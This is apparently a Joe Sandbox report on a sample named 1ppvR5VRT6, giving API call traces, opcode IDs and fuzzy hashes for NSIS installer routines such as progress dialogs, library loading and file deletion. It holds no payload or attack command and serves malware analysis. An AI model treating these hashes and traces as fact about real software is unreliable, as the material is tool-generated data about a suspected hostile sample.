                              • Opcode ID: 84b556ce97db38d950ada7426c365b30dcfc03bcdc7c69a4d791f1b42b63748e
                              • Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
                              • Opcode Fuzzy Hash: 84b556ce97db38d950ada7426c365b30dcfc03bcdc7c69a4d791f1b42b63748e
                              • Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E
                              APIs
                              • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                              • GetSysColor.USER32(00000000), ref: 004041FA
                              • SetTextColor.GDI32(?,00000000), ref: 00404206
                              • SetBkMode.GDI32(?,?), ref: 00404212
                              • GetSysColor.USER32(?), ref: 00404225
                              • SetBkColor.GDI32(?,?), ref: 00404235
                              • DeleteObject.GDI32(?), ref: 0040424F
                              • CreateBrushIndirect.GDI32(?), ref: 00404259
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                              • Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
                              • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                              • Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64
                              APIs
                              • lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                              • lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                              • lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                              • SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID:
                              • API String ID: 2531174081-0
                              • Opcode ID: b8810ef0ff581cc93021c6b5d9a35f33efec56338cc0de2958aa334abbd55611
                              • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                              • Opcode Fuzzy Hash: b8810ef0ff581cc93021c6b5d9a35f33efec56338cc0de2958aa334abbd55611
                              • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8
                              APIs
                              • DestroyWindow.USER32(?,00000000), ref: 00402D11
                              • GetTickCount.KERNEL32 ref: 00402D2F
                              • wsprintfA.USER32 ref: 00402D5D
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                              • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                • Part of subcall function 00402CDD: MulDiv.KERNEL32(?,00000064,?), ref: 00402CF2
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                              • String ID: ... %d%%
                              • API String ID: 722711167-2449383134
                              • Opcode ID: 581d0362c9c78e99b63bfe565d6ea7dfe38dfe796f0dab54d06828bbe0081036
                              • Instruction ID: 05ae4936d853d48bc68e56bc5a14e51e8e164cb381f888baae312624535d0e7d
                              • Opcode Fuzzy Hash: 581d0362c9c78e99b63bfe565d6ea7dfe38dfe796f0dab54d06828bbe0081036
                              • Instruction Fuzzy Hash: 3601D630901620EBD722AB60BF0CEDE7A78EF48701B44003BF555B51E4CBB84C41CA9E
                              APIs
                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                              • GetMessagePos.USER32 ref: 00404AAE
                              • ScreenToClient.USER32(?,?), ref: 00404AC8
                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction ID: d6f0acc73841e927dc0e8d5cbc3229ede44acf808998aa5f41192725d6cd764a
                              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction Fuzzy Hash: 03019275900219BADB00DB95CD81BFFBBBCAF45711F10012BBA10B61C0C7B495018F94
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                              • wsprintfA.USER32 ref: 00402CB0
                              • SetWindowTextA.USER32(?,?), ref: 00402CC0
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                              • API String ID: 1451636040-1158693248
                              • Opcode ID: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                              • Instruction ID: dd36d9f71d3f98b31449e9fd5fd6fbb92ab2983ffa1af0ce52afe90c4e52f268
                              • Opcode Fuzzy Hash: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                              • Instruction Fuzzy Hash: B6F03C7150020CFBEF209F61CE0ABAE7769EB44344F00803AFA16B52D0DBB999559F99
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                              • wsprintfA.USER32 ref: 00406413
                              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00406427
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                              • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                              • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                              • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                              • GlobalFree.KERNEL32(?), ref: 004027E5
                              • GlobalFree.KERNEL32(00000000), ref: 004027F8
                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: dcacf9be938e6bab2b24fd9971acd25967e82a84bb27c597e485d254bc79bccb
                              • Instruction ID: 2027d9f4b10c536beff5d97c30926d1382b99fb2686dd4663458e7dd77d5dad7
                              • Opcode Fuzzy Hash: dcacf9be938e6bab2b24fd9971acd25967e82a84bb27c597e485d254bc79bccb
                              • Instruction Fuzzy Hash: C5219C71800128BBDF216FA5DE49DAE7A79EF05324F14423EF524762E1CA794D418FA8
                              APIs
                              • lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                              • wsprintfA.USER32 ref: 00404A27
                              • SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s$0B
                              • API String ID: 3540041739-2032437577
                              • Opcode ID: b23186d452688b2e8875940d2b1567af98af2718b135d1178c3f368161fe70b0
                              • Instruction ID: 454b38ceac9876f8861c3790537a611104b372144c9fccdb064e9295d2f1ba63
                              • Opcode Fuzzy Hash: b23186d452688b2e8875940d2b1567af98af2718b135d1178c3f368161fe70b0
                              • Instruction Fuzzy Hash: 2111E773A0412837DB0066799C45EAF329CDB85374F254637FA26F31D1EA78CC1242E9
                              APIs
                              • CharNextA.USER32(?,*?|<>/":,00000000,0042A000,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                              • CharNextA.USER32(?,0042A000,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                              • CharPrevA.USER32(?,?,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: *?|<>/":
                              • API String ID: 589700163-165019052
                              • Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                              • Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
                              • Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                              • Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD
                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,0040A400,0040A400,00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID:
                              • API String ID: 1941528284-0
                              • Opcode ID: dc8ff8f613ccaf3a1bdddd658223a71cf5c03a6f10e6b809243d1d3cf6c4a793
                              • Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
                              • Opcode Fuzzy Hash: dc8ff8f613ccaf3a1bdddd658223a71cf5c03a6f10e6b809243d1d3cf6c4a793
                              • Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E
                              APIs
                              • GetDC.USER32(?), ref: 00401D98
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                              • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                              • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: 74ac6799808a35a38ef0222afa5692bf00b997bfa79daeac73048440a50110dd
                              • Instruction ID: bb5471ef097cc8c5e92714fe4b65473af6cf7b7baf5f4d2141323caa5fcdcc79
                              • Opcode Fuzzy Hash: 74ac6799808a35a38ef0222afa5692bf00b997bfa79daeac73048440a50110dd
                              • Instruction Fuzzy Hash: D4014C72944240AFE7006BB5AE5AA997FE8DB55305F10C839F241BA2F2CB7805458FAD
                              APIs
                              • GetDlgItem.USER32(?), ref: 00401D3F
                              • GetClientRect.USER32(00000000,?), ref: 00401D4C
                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                              • DeleteObject.GDI32(00000000), ref: 00401D8A
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: ad1215dfc819b2c5c4de7a1a53f68875bc6cfa7ccac298a48e27e0db3473e380
                              • Instruction ID: 074f51ed6dd20aae2d42350fdade0312ac008d0ce280de7d9e26dccf07732080
                              • Opcode Fuzzy Hash: ad1215dfc819b2c5c4de7a1a53f68875bc6cfa7ccac298a48e27e0db3473e380
                              • Instruction Fuzzy Hash: 62F0FFB2600515AFDB00EBA4DE88DAFB7BCFB44301B04447AF645F2191CB748D018B38
                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                              • Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
                              • Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                              • Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402028
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402038
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID:
                              • API String ID: 2987980305-0
                              • Opcode ID: 3b5be73adf85405213ea04b1693982704ad386d22b40f5588508e7c9aa8f58d6
                              • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                              • Opcode Fuzzy Hash: 3b5be73adf85405213ea04b1693982704ad386d22b40f5588508e7c9aa8f58d6
                              • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E
                              APIs
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                              • RegCloseKey.ADVAPI32(?), ref: 00402C22
                              • RegCloseKey.ADVAPI32(?), ref: 00402C43
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Close$Enum
                              • String ID:
                              • API String ID: 464197530-0
                              • Opcode ID: 03e0a49003aaeb5a403670c18ff433aeaee3fdf9291277d8cb25cd743ef3ba95
                              • Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
                              • Opcode Fuzzy Hash: 03e0a49003aaeb5a403670c18ff433aeaee3fdf9291277d8cb25cd743ef3ba95
                              • Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68
                              APIs
                              • CreateDirectoryA.KERNEL32(?,?,0042B400), ref: 004056C9
                              • GetLastError.KERNEL32 ref: 004056DD
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                              • GetLastError.KERNEL32 ref: 004056FC
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID:
                              • API String ID: 3449924974-0
                              • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                              • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                              • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                              • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9
                              APIs
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
